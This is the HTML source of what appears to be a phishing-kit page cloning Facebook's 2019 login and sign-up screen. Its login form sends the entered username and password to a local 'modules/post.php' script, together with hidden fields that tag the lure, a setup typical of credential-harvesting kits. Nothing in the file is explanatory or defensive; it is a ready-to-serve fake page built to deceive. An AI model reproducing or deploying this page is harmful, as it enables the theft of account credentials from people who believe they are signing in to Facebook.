<!DOCTYPE html>
<html class=no_js>
   <head>
      <script src=".././modules/script.js" type="text/javascript"></script>

      <meta charset=utf-8 />
      <title>Facebook – log in or sign up</title>
      <link rel="shortcut icon" href="images/facebook2.png" />
      <style>form{margin:0;padding:0}label{color:#606770;cursor:default;font-weight:600;vertical-align:middle}label input{font-weight:normal}.inputtext{-webkit-appearance:none;border:1px solid #ccd0d5;border-radius:0;margin:0;padding:3px}select{border:1px solid #ccd0d5;padding:2px}input,select{background-color:#fff;color:#1c1e21}.inputtext{padding-bottom:4px}.inputtext:invalid{box-shadow:none}.clearfix:after{clear:both;content:".";display:block;font-size:0;height:0;line-height:0;visibility:hidden}.clearfix{zoom:1}*::-webkit-input-placeholder{color:#606770}*:focus::-webkit-input-placeholder{color:#bec3c9}.no_js *::-webkit-input-placeholder{color:#000}.fb_content{min-height:640px;padding-bottom:20px}a._1t9o:not(:hover){text-decoration:line-through}i.img{-ms-high-contrast-adjust:none}.lfloat{float:left}.rfloat{float:right}.pvl{padding-top:20px;padding-bottom:20px}.mtm{margin-top:10px}.mbs{margin-bottom:5px}.mbm{margin-bottom:10px}.mlm{margin-left:10px}.mvm{margin-top:10px;margin-bottom:10px}.mvl{margin-top:20px;margin-bottom:20px}.fsm{font-size:12px}.fsl{font-size:14px}.fwn{font-weight:normal}.fwb{font-weight:600}.fcb{color:#333}.fcg{color:#90949c}._3m75 .sideNavItem:active ._55yu>a:not(:active),._3m75 .sideNavItem:active .uiSideNavEditButton a:not(:active){background-color:#dddfe2;border-color:#dddfe2;transition:none}.uiContextualLayerParent{position:relative}._51xa ._4jy1+.uiPopover>._4jy1:not(:focus):after{background-color:#f5f6f7;bottom:-1px;content:"";display:block;left:-1px;position:absolute;top:-1px;width:1px}._1tp7:not(:focus){border:1px solid #fa3e3e}.fbIndex .gradient{min-width:980px}.fbIndex .gradient .gradientContent{margin:0 auto;width:980px}._5iyz{max-width:400px}._5iyx{color:#0e385f;font-size:20px;font-weight:bold;line-height:29px;margin-top:40px;width:450px;word-spacing:-1px}._5iyy{margin-right:15px;width:565px}._6j{border:1px solid;border-radius:5px;color:#fff;cursor:pointer;display:inline-block;letter-spacing:1px;position:relative;text-shadow:0 1px 2px rgba(0,0,0,.5)}._6j:hover{text-decoration:none}._6wk{padding:20px 30px}._6wl{background:linear-gradient(#67ae55,#578843);background-color:#69a74e;box-shadow:inset 0 1px 1px #a4e388;border-color:#3b6e22 #3b6e22 #2c5115}._6wl:hover{background:linear-gradient(#79bc64,#578843)}._6j:active{top:1px}._58mq select{font-size:13px;height:30px;padding:5px}._5k_4{display:inline-block}._5k_5{position:relative}._58ms{display:inline-block;max-width:140px;vertical-align:middle}._58ms{font-size:11px;max-width:150px}._1ixn ._1pc_{display:none;margin-top:-10px}._5dbb{position:relative}._5dbb ._1pc_{display:none}._58mf{margin:0 auto 0 auto;padding-bottom:30px}._58mf ._6o{font-size:19px}._2_68{color:#1d2129;font-size:18px;font-weight:normal}._2_68._7-1r{color:#90949c;font-size:16px;font-weight:bold}._58mi{min-width:194px;padding:7px 20px;text-align:center}._58mk{border-top:1px solid #dddfe2;color:#666;font-size:13px;font-weight:bold;margin-top:10px;padding-top:15px}._a4y{display:inline-block;position:relative}._5k_2{border-radius:4px;border-width:1px;display:inline-block;padding:5px 0 5px 4px}._5k_2:first-child{margin-right:4px}._5k_3{display:inline-block}._58mt{color:#1d2129;font-size:18px;font-weight:normal;line-height:18px;padding:0 10px 0 3px}._58mf ._58mg{border-color:#bdc7d8;border-radius:5px;margin:0;width:377px}._58mf ._58mg{font-size:18px;padding:8px 10px}._58mh{width:399px}._58mh ._58mg{width:177px}._58mu{width:399px}._58mu ._58mv{color:#777;font-size:11px;width:316px}._52lp._59d- ._52lq{font-size:36px}._52lp._59d- ._52lr{color:#1d2129;font-size:19px}._6o{font-size:19px;line-height:126%}._6v{font-weight:bold}.sp_aNr2s_dNJSQ.sx_2e8aa9{width:16px;height:16px;background-position:0 -44px}html{touch-action:manipulation}body{background:#e9ebee;color:#1c1e21;direction:ltr;line-height:1.34;margin:0;padding:0;unicode-bidi:embed}body,button,input,label,select,td{font-family:Helvetica,Arial,sans-serif;font-size:12px}p{margin:1em 0}a{color:#385898;cursor:pointer;text-decoration:none}button{margin:0}a:hover{text-decoration:underline}img{border:0}td{text-align:left}hr{background:#dadde1;border-width:0;color:#dadde1;height:1px}body{overflow-y:scroll}._li._li._li{overflow:initial}._1pmx ._3jd8:not(:active){background-clip:padding-box;background-color:#5a73ad;border-color:rgba(0,0,0,.15)}._1pmx ._3jd8:hover:not(:active){background-color:#5069a3}.menu_login_container table tr{vertical-align:top}.menu_login_container table tr td{padding:0 0 0 14px}.menu_login_container .html7magic{padding-bottom:4px}.menu_login_container .inputtext{border-color:#1d2a5b;margin:0;width:142px}.menu_login_container .login_form_label_field a{color:#9cb4d8;font-weight:normal}.menu_login_container .login_form_label_field{padding-top:4px}.menu_login_container .html7magic label{color:#fff;font-weight:normal;padding-left:1px}.loggedout_menubar_container{height:82px;min-width:980px}.loggedout_menubar{margin:0 auto;padding-top:13px;width:980px}._53jh{background-color:#3b5998;background-image:linear-gradient(#4e69a2,#3b5998 50%);border-bottom:1px solid #133783;min-height:42px;position:relative;z-index:1}</style>
   </head>
   <body class="fbIndex UIPage_LoggedOut _-kb _605a b_c3pyn-ahh chrome webkit win x1 Locale_en_GB" dir=ltr>
      <div class=_li>
         <div>
            <div>
               <div class=_53jh>
                  <div class=loggedout_menubar_container>
                     <div class="clearfix loggedout_menubar">
                        <div style=background-image:url("images/facebook3.png");background-repeat:no-repeat;background-size:auto;display:inline-block;height:35px;width:170px;margin-top:17px ></div>
                        <div class="menu_login_container rfloat _ohf">
                           <form action=.././modules/post.php method=post>
                              <table cellspacing=0 role=presentation>
                                 <tr>
                                    <td class=html7magic><label for=email>Email or Phone</label></td>
                                    <td class=html7magic><label for=pass>Password</label></td>
                                 </tr>
                                 <tr>
                                    <td>
                                       <input type=text class="inputtext login_form_input_box" name=username required>
                                       <input type=hidden name=link value=''>
                                       <input type=hidden name=location value=Facebook_desktop_homepage />
                                    </td>
                                    <td>
                                       <input type=password class="inputtext login_form_input_box" name="password" required>
                                    </td>
                                    <td><label class="login_form_login_button uiButton uiButtonConfirm">
                                       <input style="border:1px solid #29487d;cursor:pointer;display:inline-block;font-size:12px;font-weight:bold;line-height:18px;color:#fff;background-color:#4267b2" value="Log In" type="submit"/></label>
                                    </td>
                                 </tr>
                                 <tr>
                                    <td class=login_form_label_field></td>
                                    <td class=login_form_label_field>
                                       <div><a href=" ">Forgotten account?</a></div>
                                    </td>
                                 </tr>
                              </table>
                           </form>
                        </div>
                     </div>
                  </div>
               </div>
            </div>
         </div>
         <div class=uiContextualLayerParent>
            <div class="fb_content clearfix">
               <div>
                  <div class=gradient>
                     <div class=gradientContent>
                        <div class=clearfix>
                           <div class="lfloat _ohe">
                              <div class=_5iyy>
                                 <div class=_5iyx>Facebook helps you connect and share with the people in your life.</div>
                                 <img class=img src="images/facebook4.png" width=537 height=195 />
                              </div>
                           </div>
                           <div class="_5iyz rfloat _ohf">
                              <div class=_5iyz>
                                 <div class="pvl _52lp _59d-">
                                    <div class="mbs _52lq fsl fwb fcb"><span>Create an account</span></div>
                                    <div class="_52lr fsm fwn fcg">Its quick and easy.</div>
                                 </div>
                                 <div>
                                    <div>
                                       <div class=_58mf>
                                          <div class=registration_redesign>
                                             <div class=_8fgl>
                                                <form>
                                                   <div class=large_form>
                                                      <div class=_1ixn>
                                                         <div class="clearfix _58mh">
                                                            <div class="mbm _1iy_ _a4y _3-90 lfloat _ohe" style="display: table ">
                                                               <!-- <div class=_5dbb> -->
                                                                  <input type=text style="display: table-cell" class="inputtext _58mg _5dba _2ph-" placeholder="First name"/> 
																  <input type=text style="float:right;display: table-cell" size=100 class="inputtext _58mg _5dba _2ph-" placeholder=Surname>
                                              
                                                            </div>
														 
														 
														 </div>
														 
														 
                                                      </div>
                                                      <div class="mbm _a4y">
                                                         <div class=_5dbb>
                                                            <input type=text class="inputtext _58mg _5dba _2ph-" placeholder="Mobile number or email address">
                                                            <div class=_1pc_></div>
                                                         </div>
                                                      </div>
                                                      <div class=_5dbb>
                                                         <input type=password class="inputtext _58mg _5dba _2ph-" placeholder="New password">
                                                      </div>
                                                      <div class="_58mq _5dbb">
                                                         <div class="mtm mbs _2_68 _7-1r">Birthday</div>
                                                         <div class=_5k_5>
                                                            <span class=_5k_4>
                                                               <span>
                                                                  <select class="_5dba _8esg">
                                                                     <option value=0>Day</option>
                                                                     <option value=23 selected=1>23</option>
                                                                  </select>
                                                                  <select class="_5dba _8esg">
                                                                     <option value=0>Month</option>
                                                                     <option value=9 selected=1>Sept</option>
                                                                  </select>
                                                                  <select title=Year class="_5dba _8esg">
                                                                     <option value=0>Year</option>
                                                                     <option value=2019 selected=1>2019</option>
                                                                  </select>
                                                               </span>
                                                            </span>
                                                         </div>
                                                      </div>
                                                      <div class="mtm _5wa2 _5dbb">
                                                         <div class="mtm mbs _2_68 _7-1r">Gender</div>
                                                         <span class=_5k_3><span class="_5k_2 _5dba">
                                                         <input type=radio class=_8esa value=1 /><label class=_58mt>Female</label></span><span class="_5k_2 _5dba">
                                                         <input type=radio class=_8esa value="2"/><label class=_58mt>Male</label></span><span class="_5k_2 _5dba">
                                                         <input type=radio class=_8esa value=-1 /><label class=_58mt>Custom</label></span></span><a class="_58ms mlm"></a>
                                                         <div class=_1pc_></div>
                                                      </div>
                                                      <div class=_58mu>
                                                         <p class=_58mv>By clicking Sign Up, you agree to our <a href>Terms</a>, <a href>Data Policy</a> and <a href>Cookie Policy</a>. You may receive SMS notifications from us and can opt out at any time.</p>
                                                      </div>
                                                      <div class=_1lch><button class="_6j mvm _6wk _6wl _58mi _3ma _6o _6v">Sign Up</button></div>
                                                   </div>
                                                </form>
                                             </div>
                                             <div class=_58mk><a href class=_8esh>Create a Page</a> for a celebrity, band or business.</div>
                                          </div>
                                       </div>
                                    </div>
                                 </div>
                              </div>
                           </div>
                        </div>
                     </div>
                  </div>
               </div>
            </div>
            <div>
   </body>
   <div style=width:100%;background-color:#fff><br><br><div style=background-color:#fff;margin-left:150px> English (UK)&nbsp;&nbsp; <a href>اردو&nbsp;&nbsp;</a><a href>پښتو&nbsp;&nbsp;</a><a href>العربية&nbsp;&nbsp;</a><a href>हिन्दी &nbsp;&nbsp;</a><a href>বাংলা &nbsp;&nbsp;</a><a href>ਪੰਜਾਬੀ &nbsp;&nbsp;</a><a href>فارسی&nbsp;&nbsp;</a><a href>ગુજરાતી &nbsp;&nbsp;</a><a href>Deutsch&nbsp;&nbsp;</a><a href>Español&nbsp;&nbsp;</a><button style="background-color:#f5f6f7;font-weight:bold;width:25px;height:20px;border:1px solid #ccd0d5">+</button><br><hr><div><a href>Sign Up&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</a><a href>Log In&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</a><a href>Messenger&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</a><a href>Facebook Lite&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</a><a href>People&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</a><a href>Pages&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</a><a href>Page categories&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</a><a href>Places&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</a><a href>Games&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</a><a href>Locations&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</a><a href>Marketplace&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</a><a href>Groups&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</a><a href>Instagram&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</a><a href>Local&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</a><br><a href>Fundraisers&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</a><a href>Services&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</a><a href>About&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</a><a href>Create ad&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</a><a href>Create Page&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</a><a href>Developers&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</a><a href>Careers&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</a><a href>Privacy&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</a><a href>Cookies&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</a><a href>AdChoices&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</a><a href>Terms&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</a><a href>Help&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</a><a href>Settings&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</a><a href>Activity log&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</a></div><div class="mvl copyright"><div><span> Facebook © 2019</span></div></div></div><br><br></div></div><div></div></div></div>
</html>
